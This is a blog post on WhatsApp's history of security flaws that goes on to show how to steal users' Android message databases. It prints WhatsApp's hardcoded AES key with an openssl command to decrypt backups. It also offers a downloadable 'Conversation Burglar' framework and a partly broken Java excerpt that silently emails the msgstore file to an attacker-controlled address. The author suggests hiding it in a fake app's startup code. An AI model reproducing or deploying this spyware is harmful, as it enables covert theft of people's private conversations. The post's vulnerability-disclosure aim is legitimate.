Leaking Whatsapp – stealing conversations silently


Whatsapp, the fast-growing mobile messaging service, is the main threat to the (outdated) business model of telecommunications operators. Its exponencial numbers confirm that telcos react late and bad: Whatsapp has taken a position that will be hard to unthrone. The only apparent risk lies on another companies using the same concept of Push notifications: recently, Line appears to claim some users adding some more functionalities.

Business besides, is amazing to see how the security in Whatsapp is inexistant.  In an attempt to be moderate, I will simply say that using the word “security” is a disinformed statement. Being aggressive I would use other words.

In May 2011, there was a reported bug which left user accounts open for hijacking. This was the first public one. Since then, it was reported that communications within WhatsApp were not encrypted, being the data sent and received in plaintext. This allowed any person to intercept messages by connecting to the same WiFi as the target phone (an application for Android was even published on the market, although it was removed after a few weeks by Google). In May 2012 the bug was reported to be fixed, although took one year to implement a fix that is not specially complex.

In September 2011, a new version of WhatsApp allowed forged messages to be sent and messages from any WhatsApp user to be read.

On January 6, 2012, an unknown hacker published a website  which made possible to change the status of an arbitrary whatsapp user, as long as the phone number was known. This bug was reported as fixed on January 9… but the only measure that was taken was blocking the website’s IP address. As a reaction, a Windows tool was made available for download providing the same functionality. This issue has not been resolved until now.

On January 13, 2012, Whatsapp was pulled from the iOS App Store for a non disclosed reason. The app was added back to the App Store 4 days later. German Tech blog The H demonstrated how to hijack any WhatsApp account on September 14, 2012. WhatsApp reacted with a legal threat to WhatsAPI’s developers.

The last unassailable bastion was the local database of messages, since it was physically stored in the device and we would need access to it… in theory. Let’s gonna show how can we achieve this. In most cases it is possible to obtain the WhatsApp message history from an encrypted device or backup, for details read this paper: WhatsApp Database Encryption Project Report

Summarizing: The database containing all the WhatsApp messages is stored in a SQLite file format. For iOS phones this file is in the path: [App ID] / Documents / ChatStorage.sqlite and in the case of Android phones at / com.whatsapp / databases / msgstore.db. This file is unencrypted, and this requires the phone to access the jailbreaked. In Android, the backup file is stored in the external memory card, and was also not encrypted. This changed in one application update, and now, if the phone is lost or stolen, the messages can not be read.

Unfortunately, the application uses the same key for the encryption (AES-192-ECB) (346a23652a46392b4d73257c67317e352e3372482177652c), and there is no use of enthropy or unique factors for each device, so the database can be unencrypted within a matter of seconds.

openssl enc -d  -aes-192-ecb -in msgstore-1.db.crypt -out msgstore.db.sqlite -K346a23652a46392b4d73257c67317e352e3372482177652c


So, we know how to break the encryption. Now we have to solve the problem of having access to the device.

Android uses permissions to determine what the applications can do when they are install on the device. In order to read from the external storage we need to use the permission android.permission.WRITE_EXTERNAL_STORAGE. By using that, we will be able to access all the files within the SDCard. Surprisingly, Whatsapp developers didn’t use the internal storage for the application, which would have prevent any application from stealing their data.

Now that we can access the data, we need to send it somewhere else. By default, Android allows us to use Intents in order to send emails. But this is not transparent at all: the user will be able to see that we are trying to send an email to an unknown email address, and this action will be canceled. But we can use some other techniques. For example, we could use a transparent layer, connect to a mail server without triggering the user perception and adcquire the file with the precious information.

I have developed a framework (WhatsApp Conversation Burglar) that can be included within an Android application, and steal the data without the user getting to know it. You can download it from here.

Let’s see how it works:

The framework presents a dummy Activity (MailSenderActivity), with only a button. We have the following listener when the button is clicked:

 public void onClick(View v) {
            	try {   
                	AsyncTask<Void, Void, Void> m = new AsyncTask<Void, Void, Void>() {

						protected Void doInBackground(Void... arg0) {
							GMailSender sender = new GMailSender(EMAIL_STRING, PASSWORD_STRING);
		                    try {
		                    	sender.addAttachment("/storage/sdcard0/WhatsApp/Databases/msgstore.db.crypt", SUBJECT_STRING);
							} catch (Exception e) {
							return null;
                } catch (Exception e) {   
                    DebugLog.e("SendMail", e.getMessage());   

This section of code initializes an object GMailSender with some parameters. The function addAttachment() attach a target file to be sent (in our case, it is the database containing all the WhatsApp messages) and a SUBJECT to the email. The function sendMail() just send the email with the required information (SUBJECT_STRING, BODY_STRING, EMAIL_STRING, RECIPIENT_STRING). The class GMailSender is the object responsible of all the email communication, using the library JavaMail. The code is self-explanatory.

By setting the right parameters, the file with all the conversations is sent to the provided email address, where we can decrypt it by using the line I provided before in the terminal. If you want to use this framework in your application, you only have to add it as a library, and include the code within the application (probably on the onCreate() method of the first activity triggered, so you make sure the conversations are stolen when the application starts). A fake application could include this framework, and still all the conversations from the users installing it

There is no way to prevent this error, just removing the file with all the conversations. WhatsApp could use a different kind of encryption (using data such as device IMEI, UNIX time of installation or any non replicable information), or just move it to the private application folder (/data/data/com.package.name/). But considering their tragic history on security we probably can not rely on this.

If you have any comment about the previous post feel free to contact me per email.


Enrique López-Mañas